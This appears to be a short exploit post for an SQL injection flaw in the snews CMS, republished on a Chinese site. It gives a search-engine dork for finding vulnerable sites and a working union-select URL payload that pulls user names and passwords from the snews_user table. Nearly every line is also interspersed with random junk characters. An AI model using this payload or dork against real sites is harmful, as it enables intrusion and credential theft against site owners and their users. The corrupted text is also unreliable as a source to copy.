标题: CMS snews SQL Injection Vulnerability/ O7 [" C- f! W( F! p6 W: p; h2 C2 i$ ^
作者: By onestree
; p% X8 p! q! l5 R! |# P- Q下载地址 : http://snewscms.com/% n. x, H4 S& a7 r5 W- q
测试平台 : ubuntu 12.10 / win 7
2 t& v. U1 K7 X! g# F; O* m关键词: inurl:"tanyakan pada rumput yang bergoyang"
. k6 s. n* S4 C6 `
3 e0 A* s; L9 i( i) u# ?3 A
/ r9 \6 S' w, T0 e9 R. N*************************************************************2 y7 Q/ v) A7 f7 t
3 r7 G: F8 [4 f" M
SQL poc:
, J& q2 f9 I: M8 D
) I8 S' _$ z# Xhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
7 r. \. s- A3 T `& K
+ i2 B) S* x# V% T* T* t2 h/ R示例
+ w/ c4 u' j- k9 y! e 6 ~6 k$ a. j# A; b1 |
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*' o) |, \* X% u& Q" ^$ m
0 c, S5 E- M1 P* C) W7 e; Y$ e H
: v: w3 L4 [6 ]* P致谢:2 p* w8 E9 J; N9 l2 D4 z+ }0 y/ o
- j7 x1 m0 M# [ Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell* H& H% F; L+ r2 k& T
+ g7 K- r0 ?) t! F# c
indonesiancoder - moeslimh4x0r - go-coder
& [# r6 }6 ]+ r8 I6 ^; z & C }. m& F n, e% ^
spesial my hunny :*& V# [* W4 M9 c4 q
|